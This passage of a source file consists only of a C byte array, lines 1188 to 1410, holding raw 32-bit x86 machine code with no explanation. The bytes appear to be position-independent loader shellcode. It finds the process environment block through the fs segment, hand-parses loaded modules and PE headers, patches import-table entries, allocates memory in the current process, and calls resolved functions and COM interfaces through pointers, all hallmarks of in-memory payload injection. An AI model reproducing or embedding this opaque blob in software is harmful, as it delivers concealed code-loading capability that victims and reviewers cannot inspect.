1188 0x44, 0x24, 0x08, 0x8d, 0x85, 0x3c, 0xff, 0xff, 0xff, 0x89, 0x44, 0x24,
1189 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x26, 0x23, 0x00,
1190 0x00, 0x89, 0x45, 0x90, 0x83, 0x7d, 0x90, 0x00, 0x78, 0x64, 0x8b, 0x85,
1191 0x1c, 0xfc, 0xff, 0xff, 0x8b, 0x55, 0xb4, 0x89, 0x54, 0x24, 0x08, 0x89,
1192 0x44, 0x24, 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x40,
1193 0x22, 0x00, 0x00, 0x89, 0x45, 0x90, 0x83, 0x7d, 0x90, 0x00, 0x78, 0x41,
1194 0x8b, 0x85, 0x2c, 0xfc, 0xff, 0xff, 0x8b, 0x55, 0xb4, 0x89, 0x54, 0x24,
1195 0x04, 0x89, 0x04, 0x24, 0xe8, 0x5b, 0x22, 0x00, 0x00, 0xeb, 0x2b, 0x90,
1196 0xeb, 0x28, 0x90, 0xeb, 0x25, 0x90, 0xeb, 0x22, 0x90, 0xeb, 0x1f, 0x90,
1197 0xeb, 0x1c, 0x90, 0xeb, 0x19, 0x90, 0xeb, 0x16, 0x90, 0xeb, 0x13, 0x90,
1198 0xeb, 0x10, 0x90, 0xeb, 0x0d, 0x90, 0xeb, 0x0a, 0x90, 0xeb, 0x07, 0x90,
1199 0xeb, 0x04, 0x90, 0xeb, 0x01, 0x90, 0x8d, 0x65, 0xf4, 0x5b, 0x5e, 0x5f,
1200 0x5d, 0xc3, 0x55, 0x89, 0xe5, 0x81, 0xec, 0xa8, 0x00, 0x00, 0x00, 0x8b,
1201 0x45, 0x08, 0x05, 0x44, 0x04, 0x00, 0x00, 0x89, 0x45, 0xf4, 0xc7, 0x45,
1202 0xf0, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x1c, 0x8b, 0x55, 0xf0, 0x8b, 0x45,
1203 0xf4, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x8d, 0x8d, 0x70, 0xff, 0xff, 0xff,
1204 0x8b, 0x55, 0xf0, 0x01, 0xca, 0x88, 0x02, 0x83, 0x45, 0xf0, 0x01, 0x8b,
1205 0x55, 0xf0, 0x8b, 0x45, 0xf4, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0,
1206 0x74, 0x15, 0x8b, 0x55, 0xf0, 0x8b, 0x45, 0xf4, 0x01, 0xd0, 0x0f, 0xb6,
1207 0x00, 0x3c, 0x3b, 0x74, 0x06, 0x83, 0x7d, 0xf0, 0x7f, 0x7e, 0xc0, 0x83,
1208 0x7d, 0xf0, 0x00, 0x74, 0x37, 0x8b, 0x45, 0xf0, 0x83, 0xc0, 0x01, 0x01,
1209 0x45, 0xf4, 0x8d, 0x95, 0x70, 0xff, 0xff, 0xff, 0x8b, 0x45, 0xf0, 0x01,
1210 0xd0, 0xc6, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x89, 0x44, 0x24, 0x04, 0x8d,
1211 0x85, 0x70, 0xff, 0xff, 0xff, 0x89, 0x04, 0x24, 0xe8, 0xe3, 0x1c, 0x00,
1212 0x00, 0x85, 0xc0, 0x75, 0x81, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xeb, 0x06,
1213 0x90, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x83,
1214 0xec, 0x58, 0x8b, 0x45, 0x08, 0x8b, 0x90, 0xfc, 0x01, 0x00, 0x00, 0x8b,
1215 0x80, 0xf8, 0x01, 0x00, 0x00, 0x89, 0x45, 0xf4, 0x83, 0x7d, 0x0c, 0x00,
1216 0x75, 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x71, 0x8b, 0x45, 0xf4,
1217 0x89, 0x44, 0x24, 0x18, 0xc7, 0x44, 0x24, 0x14, 0x00, 0x00, 0x00, 0x00,
1218 0xc7, 0x44, 0x24, 0x10, 0x1c, 0x00, 0x00, 0x00, 0x8d, 0x45, 0xd4, 0x89,
1219 0x44, 0x24, 0x0c, 0xc7, 0x44, 0x24, 0x08, 0x00, 0x00, 0x00, 0x00, 0x8b,
1220 0x45, 0x0c, 0x89, 0x44, 0x24, 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff,
1221 0xff, 0xe8, 0xe3, 0x21, 0x00, 0x00, 0x89, 0x45, 0xf0, 0x83, 0x7d, 0xf0,
1222 0x00, 0x79, 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x28, 0x8b, 0x45,
1223 0xe4, 0x3d, 0x00, 0x10, 0x00, 0x00, 0x75, 0x19, 0x8b, 0x45, 0xec, 0x3d,
1224 0x00, 0x00, 0x02, 0x00, 0x75, 0x0f, 0x8b, 0x45, 0xe8, 0x83, 0xf8, 0x04,
1225 0x75, 0x07, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xeb, 0x05, 0xb8, 0x00, 0x00,
1226 0x00, 0x00, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x81, 0xec, 0x08, 0x01, 0x00,
1227 0x00, 0xc7, 0x45, 0xcc, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0x94, 0x18,
1228 0x00, 0x00, 0x00, 0x8b, 0x45, 0x94, 0x64, 0x8b, 0x00, 0x89, 0x45, 0x90,
1229 0x8b, 0x45, 0x90, 0x8b, 0x40, 0x30, 0x89, 0x45, 0xc8, 0x8b, 0x45, 0xc8,
1230 0x8b, 0x40, 0x10, 0x89, 0x45, 0xc4, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x38,
1231 0x8b, 0x55, 0x08, 0x81, 0xc2, 0x1c, 0x03, 0x00, 0x00, 0x89, 0x14, 0x24,
1232 0xff, 0xd0, 0x83, 0xec, 0x04, 0x89, 0x45, 0xc0, 0x8b, 0x45, 0xc0, 0x89,
1233 0x45, 0xbc, 0x8b, 0x45, 0xbc, 0x8b, 0x40, 0x3c, 0x89, 0xc2, 0x8b, 0x45,
1234 0xc0, 0x01, 0xd0, 0x89, 0x45, 0xb8, 0x8b, 0x45, 0xb8, 0x8d, 0x50, 0x18,
1235 0x8b, 0x45, 0xb8, 0x0f, 0xb7, 0x40, 0x14, 0x0f, 0xb7, 0xc0, 0x01, 0xd0,
1236 0x89, 0x45, 0xb4, 0xc7, 0x45, 0xf4, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x66,
1237 0x8b, 0x55, 0xf4, 0x89, 0xd0, 0xc1, 0xe0, 0x02, 0x01, 0xd0, 0xc1, 0xe0,
1238 0x03, 0x89, 0xc2, 0x8b, 0x45, 0xb4, 0x01, 0xd0, 0x8b, 0x10, 0x8b, 0x45,
1239 0x08, 0x05, 0x14, 0x03, 0x00, 0x00, 0x8b, 0x00, 0x39, 0xc2, 0x75, 0x3e,
1240 0x8b, 0x55, 0xf4, 0x89, 0xd0, 0xc1, 0xe0, 0x02, 0x01, 0xd0, 0xc1, 0xe0,
1241 0x03, 0x89, 0xc2, 0x8b, 0x45, 0xb4, 0x01, 0xd0, 0x8b, 0x50, 0x0c, 0x8b,
1242 0x45, 0xc0, 0x01, 0xd0, 0x89, 0x45, 0xec, 0x8b, 0x55, 0xf4, 0x89, 0xd0,
1243 0xc1, 0xe0, 0x02, 0x01, 0xd0, 0xc1, 0xe0, 0x03, 0x89, 0xc2, 0x8b, 0x45,
1244 0xb4, 0x01, 0xd0, 0x8b, 0x40, 0x08, 0xc1, 0xe8, 0x02, 0x89, 0x45, 0xf0,
1245 0xeb, 0x13, 0x83, 0x45, 0xf4, 0x01, 0x8b, 0x45, 0xb8, 0x0f, 0xb7, 0x40,
1246 0x06, 0x0f, 0xb7, 0xc0, 0x39, 0x45, 0xf4, 0x72, 0x8b, 0x8b, 0x45, 0x08,
1247 0x8b, 0x40, 0x68, 0xff, 0xd0, 0x89, 0x45, 0xb0, 0xc7, 0x45, 0xf4, 0x00,
1248 0x00, 0x00, 0x00, 0xeb, 0x3f, 0x8b, 0x45, 0xf4, 0x8d, 0x14, 0x85, 0x00,
1249 0x00, 0x00, 0x00, 0x8b, 0x45, 0xec, 0x01, 0xd0, 0x89, 0x45, 0xe8, 0x8b,
1250 0x45, 0xe8, 0x8b, 0x40, 0x04, 0x39, 0x45, 0xb0, 0x75, 0x1d, 0x8b, 0x45,
1251 0x08, 0x8b, 0x80, 0xfc, 0x00, 0x00, 0x00, 0x8b, 0x55, 0x0c, 0x89, 0x54,
1252 0x24, 0x04, 0x8b, 0x55, 0xe8, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec,
1253 0x08, 0xeb, 0x0d, 0x90, 0x83, 0x45, 0xf4, 0x01, 0x8b, 0x45, 0xf4, 0x3b,
1254 0x45, 0xf0, 0x72, 0xb9, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x64, 0xff, 0xd0,
1255 0x89, 0x45, 0xac, 0xc7, 0x45, 0xf4, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x6d,
1256 0x8b, 0x45, 0xf4, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45,
1257 0xec, 0x01, 0xd0, 0x89, 0x45, 0xa8, 0x8b, 0x45, 0xa8, 0x8b, 0x40, 0x04,
1258 0x39, 0x45, 0xac, 0x75, 0x4b, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xec, 0x00,
1259 0x00, 0x00, 0xc7, 0x44, 0x24, 0x08, 0x01, 0x00, 0x00, 0x00, 0x8b, 0x55,
1260 0xe8, 0x89, 0x54, 0x24, 0x04, 0x8d, 0x55, 0x88, 0x89, 0x14, 0x24, 0xff,
1261 0xd0, 0x83, 0xec, 0x0c, 0x8b, 0x45, 0xf4, 0x8d, 0x14, 0x85, 0x00, 0x00,
1262 0x00, 0x00, 0x8b, 0x45, 0xec, 0x01, 0xc2, 0xc7, 0x44, 0x24, 0x08, 0x08,
1263 0x00, 0x00, 0x00, 0x8d, 0x45, 0x88, 0x89, 0x44, 0x24, 0x04, 0x89, 0x14,
1264 0x24, 0xe8, 0x50, 0x19, 0x00, 0x00, 0xeb, 0x0d, 0x90, 0x83, 0x45, 0xf4,
1265 0x01, 0x8b, 0x45, 0xf4, 0x3b, 0x45, 0xf0, 0x72, 0x8b, 0x8b, 0x45, 0xc8,
1266 0x8b, 0x40, 0x0c, 0x89, 0x45, 0xa4, 0x8b, 0x45, 0xa4, 0x8b, 0x40, 0x0c,
1267 0x89, 0x45, 0xe4, 0xe9, 0x95, 0x01, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x05,
1268 0x44, 0x03, 0x00, 0x00, 0x89, 0x45, 0xd8, 0xc7, 0x45, 0xd0, 0x01, 0x00,
1269 0x00, 0x00, 0xc7, 0x45, 0xd4, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf4,
1270 0x00, 0x00, 0x00, 0x00, 0xeb, 0x48, 0x8b, 0x55, 0xd8, 0x8b, 0x45, 0xf4,
1271 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x3c, 0x77, 0x75, 0x07, 0xc7, 0x45, 0xd0,
1272 0x00, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xd8, 0x8b, 0x45, 0xf4, 0x01, 0xd0,
1273 0x0f, 0xb6, 0x00, 0x3c, 0x70, 0x75, 0x07, 0xc7, 0x45, 0xd4, 0x01, 0x00,
1274 0x00, 0x00, 0x8b, 0x55, 0xd8, 0x8b, 0x45, 0xf4, 0x01, 0xd0, 0x0f, 0xb6,
1275 0x00, 0x8d, 0x8d, 0x08, 0xff, 0xff, 0xff, 0x8b, 0x55, 0xf4, 0x01, 0xca,
1276 0x88, 0x02, 0x83, 0x45, 0xf4, 0x01, 0x8b, 0x55, 0xd8, 0x8b, 0x45, 0xf4,
1277 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74, 0x15, 0x8b, 0x55, 0xd8,
1278 0x8b, 0x45, 0xf4, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x3c, 0x3b, 0x74, 0x06,
1279 0x83, 0x7d, 0xf4, 0x7f, 0x76, 0x94, 0x83, 0x7d, 0xf4, 0x00, 0x0f, 0x84,
1280 0xf4, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x01, 0x01, 0x45,
1281 0xd8, 0x8d, 0x95, 0x08, 0xff, 0xff, 0xff, 0x8b, 0x45, 0xf4, 0x01, 0xd0,
1282 0xc6, 0x00, 0x00, 0x8b, 0x45, 0xe4, 0x8b, 0x40, 0x18, 0xc7, 0x44, 0x24,
1283 0x0c, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x95, 0x08, 0xff, 0xff, 0xff, 0x89,
1284 0x54, 0x24, 0x08, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04,
1285 0x24, 0xe8, 0x29, 0xcf, 0xff, 0xff, 0x89, 0x45, 0xa0, 0x83, 0x7d, 0xa0,
1286 0x00, 0x0f, 0x84, 0xa3, 0x00, 0x00, 0x00, 0x83, 0x7d, 0xd0, 0x00, 0x74,
1287 0x4d, 0x8b, 0x45, 0xa0, 0x89, 0x45, 0xe0, 0x83, 0x7d, 0xd4, 0x00, 0x74,
1288 0x0e, 0x8b, 0x45, 0xa0, 0x89, 0x45, 0x98, 0x8b, 0x45, 0x98, 0xff, 0xd0,
1289 0x89, 0x45, 0xe0, 0x83, 0x7d, 0xe0, 0x00, 0x0f, 0x84, 0xfe, 0xfe, 0xff,
1290 0xff, 0x8b, 0x45, 0xe0, 0x8b, 0x00, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45,
1291 0x08, 0x89, 0x04, 0x24, 0xe8, 0x57, 0xfc, 0xff, 0xff, 0x85, 0xc0, 0x0f,
1292 0x84, 0xe2, 0xfe, 0xff, 0xff, 0x8b, 0x55, 0x8c, 0x8b, 0x45, 0xe0, 0x89,
1293 0x10, 0xe9, 0xd5, 0xfe, 0xff, 0xff, 0x8b, 0x45, 0xa0, 0x89, 0x45, 0xdc,
1294 0x83, 0x7d, 0xd4, 0x00, 0x74, 0x0e, 0x8b, 0x45, 0xa0, 0x89, 0x45, 0x9c,
1295 0x8b, 0x45, 0x9c, 0xff, 0xd0, 0x89, 0x45, 0xdc, 0x83, 0x7d, 0xdc, 0x00,
1296 0x0f, 0x84, 0xb1, 0xfe, 0xff, 0xff, 0x8b, 0x45, 0xdc, 0x8b, 0x00, 0x89,
1297 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x0a, 0xfc,
1298 0xff, 0xff, 0x85, 0xc0, 0x0f, 0x84, 0x95, 0xfe, 0xff, 0xff, 0x8b, 0x45,
1299 0xe8, 0x8b, 0x50, 0x04, 0x8b, 0x45, 0xdc, 0x89, 0x10, 0xe9, 0x85, 0xfe,
1300 0xff, 0xff, 0x90, 0xe9, 0x7f, 0xfe, 0xff, 0xff, 0x90, 0x8b, 0x45, 0xe4,
1301 0x8b, 0x00, 0x89, 0x45, 0xe4, 0x8b, 0x45, 0xe4, 0x8b, 0x40, 0x18, 0x85,
1302 0xc0, 0x0f, 0x85, 0x5d, 0xfe, 0xff, 0xff, 0xb8, 0x01, 0x00, 0x00, 0x00,
1303 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x53, 0x81, 0xec, 0x44, 0x03, 0x00, 0x00,
1304 0x8b, 0x45, 0x08, 0x8b, 0x90, 0xfc, 0x01, 0x00, 0x00, 0x8b, 0x80, 0xf8,
1305 0x01, 0x00, 0x00, 0x89, 0x45, 0xf4, 0x8b, 0x45, 0x08, 0x8b, 0x90, 0x2c,
1306 0x0d, 0x00, 0x00, 0x8b, 0x80, 0x28, 0x0d, 0x00, 0x00, 0x83, 0xc0, 0x01,
1307 0x83, 0xd2, 0x00, 0x01, 0xc0, 0x89, 0x85, 0xec, 0xfc, 0xff, 0xff, 0x8b,
1308 0x45, 0xf4, 0x89, 0x44, 0x24, 0x18, 0xc7, 0x44, 0x24, 0x14, 0x04, 0x00,
1309 0x00, 0x00, 0xc7, 0x44, 0x24, 0x10, 0x00, 0x30, 0x00, 0x00, 0x8d, 0x85,
1310 0xec, 0xfc, 0xff, 0xff, 0x89, 0x44, 0x24, 0x0c, 0xc7, 0x44, 0x24, 0x08,
1311 0x00, 0x00, 0x00, 0x00, 0x8d, 0x85, 0xf4, 0xfe, 0xff, 0xff, 0x89, 0x44,
1312 0x24, 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x46, 0x1d,
1313 0x00, 0x00, 0x89, 0x45, 0xf0, 0x83, 0x7d, 0xf0, 0x00, 0x0f, 0x88, 0x3d,
1314 0x03, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x48, 0x8b, 0x55, 0x0c,
1315 0x8b, 0x92, 0x24, 0x05, 0x00, 0x00, 0x01, 0xd2, 0x89, 0xd3, 0x8b, 0x95,
1316 0xf4, 0xfe, 0xff, 0xff, 0x8b, 0x4d, 0x0c, 0x81, 0xc1, 0x28, 0x05, 0x00,
1317 0x00, 0x89, 0x5c, 0x24, 0x14, 0x89, 0x54, 0x24, 0x10, 0xc7, 0x44, 0x24,
1318 0x0c, 0xff, 0xff, 0xff, 0xff, 0x89, 0x4c, 0x24, 0x08, 0xc7, 0x44, 0x24,
1319 0x04, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x04, 0x24, 0x00, 0x00, 0x00, 0x00,
1320 0xff, 0xd0, 0x83, 0xec, 0x18, 0x8d, 0x45, 0x84, 0x89, 0x45, 0xb0, 0x8d,
1321 0x45, 0xb0, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24,
1322 0xe8, 0xe1, 0x02, 0x00, 0x00, 0x8d, 0x85, 0x70, 0xff, 0xff, 0xff, 0x89,
1323 0x45, 0xb8, 0x8d, 0x45, 0xb0, 0x83, 0xc0, 0x08, 0x89, 0x44, 0x24, 0x04,
1324 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0xc5, 0x06, 0x00, 0x00, 0x8d,
1325 0x85, 0xf8, 0xfe, 0xff, 0xff, 0x89, 0x45, 0xc4, 0x8d, 0x45, 0xb0, 0x83,
1326 0xc0, 0x14, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24,
1327 0xe8, 0x43, 0x08, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xd8, 0x00,
1328 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x04,
1329 0x24, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x83, 0xec, 0x08, 0x89, 0x45,
1330 0xec, 0x83, 0x7d, 0xec, 0x00, 0x0f, 0x85, 0x07, 0x02, 0x00, 0x00, 0x8b,
1331 0x45, 0x08, 0x8b, 0x80, 0xdc, 0x00, 0x00, 0x00, 0x8b, 0x55, 0x08, 0x8d,
1332 0x9a, 0xa4, 0x08, 0x00, 0x00, 0x8b, 0x55, 0x08, 0x8d, 0x8a, 0x84, 0x08,
1333 0x00, 0x00, 0x8d, 0x55, 0xe0, 0x89, 0x54, 0x24, 0x10, 0x89, 0x5c, 0x24,
1334 0x0c, 0xc7, 0x44, 0x24, 0x08, 0x03, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24,
1335 0x04, 0x00, 0x00, 0x00, 0x00, 0x89, 0x0c, 0x24, 0xff, 0xd0, 0x83, 0xec,
1336 0x14, 0x89, 0x45, 0xec, 0x83, 0x7d, 0xec, 0x00, 0x0f, 0x85, 0xbc, 0x01,
1337 0x00, 0x00, 0x8b, 0x45, 0xe0, 0x8b, 0x00, 0x8b, 0x00, 0x8b, 0x55, 0x08,
1338 0x8d, 0x9a, 0xd4, 0x08, 0x00, 0x00, 0x8b, 0x55, 0xe0, 0x8d, 0x4d, 0xe4,
1339 0x89, 0x4c, 0x24, 0x08, 0x89, 0x5c, 0x24, 0x04, 0x89, 0x14, 0x24, 0xff,
1340 0xd0, 0x83, 0xec, 0x0c, 0x89, 0x45, 0xec, 0x83, 0x7d, 0xec, 0x00, 0x0f,
1341 0x85, 0x63, 0x01, 0x00, 0x00, 0x8b, 0x45, 0xe4, 0x8b, 0x00, 0x8b, 0x40,
1342 0x0c, 0x8b, 0x55, 0xe4, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04,
1343 0x89, 0x45, 0xec, 0x83, 0x7d, 0xec, 0x00, 0x0f, 0x85, 0x30, 0x01, 0x00,
1344 0x00, 0x8b, 0x45, 0xe0, 0x89, 0x45, 0xd0, 0x8b, 0x45, 0xe0, 0x8b, 0x00,
1345 0x8b, 0x40, 0x0c, 0x8b, 0x55, 0xe0, 0x8d, 0x4d, 0xb0, 0x89, 0x4c, 0x24,
1346 0x04, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x08, 0x89, 0x45, 0xec,
1347 0x83, 0x7d, 0xec, 0x00, 0x0f, 0x85, 0x03, 0x01, 0x00, 0x00, 0x8b, 0x45,
1348 0x08, 0x8d, 0x90, 0xe5, 0x05, 0x00, 0x00, 0x8d, 0x85, 0xf2, 0xfc, 0xff,
1349 0xff, 0x89, 0x44, 0x24, 0x08, 0x89, 0x54, 0x24, 0x04, 0x8b, 0x45, 0x08,
1350 0x89, 0x04, 0x24, 0xe8, 0x07, 0xcb, 0xff, 0xff, 0x8b, 0x45, 0x08, 0x8b,
1351 0x80, 0x9c, 0x00, 0x00, 0x00, 0x8d, 0x95, 0xf2, 0xfc, 0xff, 0xff, 0x89,
1352 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x89, 0x45, 0xe8, 0x8b, 0x45,
1353 0xe0, 0x8b, 0x00, 0x8b, 0x40, 0x20, 0x8b, 0x55, 0xe0, 0xc7, 0x44, 0x24,
1354 0x08, 0x02, 0x00, 0x00, 0x00, 0x8b, 0x4d, 0xe8, 0x89, 0x4c, 0x24, 0x04,
1355 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x89, 0x45, 0xec, 0x8b,
1356 0x45, 0x08, 0x8b, 0x80, 0xa0, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xe8, 0x89,
1357 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x83, 0x7d, 0xec, 0x00, 0x0f,
1358 0x85, 0x84, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xe4, 0x8b, 0x00, 0x8b, 0x40,
1359 0x14, 0x8b, 0x8d, 0xf4, 0xfe, 0xff, 0xff, 0x8b, 0x55, 0xe4, 0xc7, 0x44,
1360 0x24, 0x24, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00,
1361 0x00, 0x00, 0xc7, 0x44, 0x24, 0x1c, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44,
1362 0x24, 0x18, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x14, 0x00, 0x00,
1363 0x00, 0x00, 0xc7, 0x44, 0x24, 0x10, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44,
1364 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x08, 0x00, 0x00,
1365 0x00, 0x00, 0x89, 0x4c, 0x24, 0x04, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83,
1366 0xec, 0x28, 0x89, 0x45, 0xec, 0x83, 0x7d, 0xec, 0x00, 0x75, 0x1e, 0x8b,
1367 0x45, 0xe0, 0x8b, 0x00, 0x8b, 0x40, 0x14, 0x8b, 0x55, 0xe0, 0xc7, 0x44,
1368 0x24, 0x04, 0x02, 0x00, 0x00, 0x00, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83,
1369 0xec, 0x08, 0x89, 0x45, 0xec, 0x8b, 0x45, 0xe4, 0x8b, 0x00, 0x8b, 0x40,
1370 0x08, 0x8b, 0x55, 0xe4, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04,
1371 0x8b, 0x45, 0xe0, 0x8b, 0x00, 0x8b, 0x40, 0x1c, 0x8b, 0x55, 0xe0, 0x89,
1372 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x8b, 0x45, 0xe0, 0x8b, 0x00,
1373 0x8b, 0x40, 0x08, 0x8b, 0x55, 0xe0, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83,
1374 0xec, 0x04, 0x8b, 0x45, 0x08, 0x8b, 0x90, 0x2c, 0x0d, 0x00, 0x00, 0x8b,
1375 0x80, 0x28, 0x0d, 0x00, 0x00, 0x83, 0xc0, 0x01, 0x83, 0xd2, 0x00, 0x8d,
1376 0x14, 0x00, 0x8b, 0x85, 0xf4, 0xfe, 0xff, 0xff, 0x89, 0x54, 0x24, 0x08,
1377 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0x89, 0x04, 0x24, 0xe8,
1378 0xcc, 0x13, 0x00, 0x00, 0xc7, 0x85, 0xec, 0xfc, 0xff, 0xff, 0x00, 0x00,
1379 0x00, 0x00, 0x8b, 0x45, 0xf4, 0x89, 0x44, 0x24, 0x10, 0xc7, 0x44, 0x24,
1380 0x0c, 0x00, 0x80, 0x00, 0x00, 0x8d, 0x85, 0xec, 0xfc, 0xff, 0xff, 0x89,
1381 0x44, 0x24, 0x08, 0x8d, 0x85, 0xf4, 0xfe, 0xff, 0xff, 0x89, 0x44, 0x24,
1382 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x1a, 0x1a, 0x00,
1383 0x00, 0x89, 0x45, 0xf0, 0x90, 0x8b, 0x5d, 0xfc, 0xc9, 0xc3, 0x55, 0x89,
1384 0xe5, 0x83, 0xec, 0x18, 0x8b, 0x45, 0x0c, 0x89, 0x45, 0xf4, 0xe8, 0x61,
1385 0x10, 0x00, 0x00, 0xba, 0xec, 0x51, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40,
1386 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0xf4, 0x8b, 0x00, 0x89, 0x10,
1387 0xe8, 0x47, 0x10, 0x00, 0x00, 0xba, 0xcf, 0x52, 0x40, 0x00, 0xb9, 0x14,
1388 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0xf4, 0x8b, 0x00,
1389 0x89, 0x50, 0x04, 0xe8, 0x2c, 0x10, 0x00, 0x00, 0xba, 0xfa, 0x52, 0x40,
1390 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45,
1391 0xf4, 0x8b, 0x00, 0x89, 0x50, 0x08, 0xe8, 0x11, 0x10, 0x00, 0x00, 0xba,
1392 0x43, 0x54, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01,
1393 0xc2, 0x8b, 0x45, 0xf4, 0x8b, 0x00, 0x89, 0x50, 0x0c, 0xe8, 0xf6, 0x0f,
1394 0x00, 0x00, 0xba, 0x2d, 0x53, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00,
1395 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0xf4, 0x8b, 0x00, 0x89, 0x50, 0x10,
1396 0xe8, 0xdb, 0x0f, 0x00, 0x00, 0xba, 0x68, 0x54, 0x40, 0x00, 0xb9, 0x14,
1397 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0xf4, 0x8b, 0x00,
1398 0x89, 0x50, 0x14, 0xe8, 0xc0, 0x0f, 0x00, 0x00, 0xba, 0x74, 0x54, 0x40,
1399 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45,
1400 0xf4, 0x8b, 0x00, 0x89, 0x50, 0x18, 0xe8, 0xa5, 0x0f, 0x00, 0x00, 0xba,
1401 0x80, 0x54, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01,
1402 0xc2, 0x8b, 0x45, 0xf4, 0x8b, 0x00, 0x89, 0x50, 0x1c, 0xe8, 0x8a, 0x0f,
1403 0x00, 0x00, 0xba, 0xb6, 0x53, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00,
1404 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0xf4, 0x8b, 0x00, 0x89, 0x50, 0x20,
1405 0xe8, 0x6f, 0x0f, 0x00, 0x00, 0xba, 0x8c, 0x54, 0x40, 0x00, 0xb9, 0x14,
1406 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0xf4, 0x8b, 0x00,
1407 0x89, 0x50, 0x24, 0xe8, 0x54, 0x0f, 0x00, 0x00, 0xba, 0x98, 0x54, 0x40,
1408 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45,
1409 0xf4, 0x8b, 0x00, 0x89, 0x50, 0x28, 0x8b, 0x45, 0xf4, 0xc7, 0x40, 0x04,
1410 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xf4, 0x8b, 0x55, 0x08, 0x89, 0x50,
